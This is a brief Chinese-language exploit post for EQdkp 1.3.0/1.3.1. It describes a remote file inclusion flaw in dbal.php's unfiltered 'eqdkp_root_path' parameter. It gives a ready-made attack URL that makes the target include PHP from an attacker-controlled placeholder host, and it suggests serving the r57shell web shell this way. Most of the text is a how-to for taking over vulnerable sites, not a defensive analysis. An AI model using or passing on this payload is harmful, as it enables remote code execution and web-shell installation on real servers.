EQdkp 1.3.0/1.3.1版本
漏洞信息:简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。 具体情节是'dbal.php'脚本对用户提交的'eqdkp_root_path'参数缺少过滤 指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码 利用方法:http://www.XXX.cn/includes/dbal.php?eqdkp_root_path=http://XXX.cn/logging.txt?
http://XXX.cn/logging.txt 是你网站是的PHP代码! 要是E文的! 比如r57shell |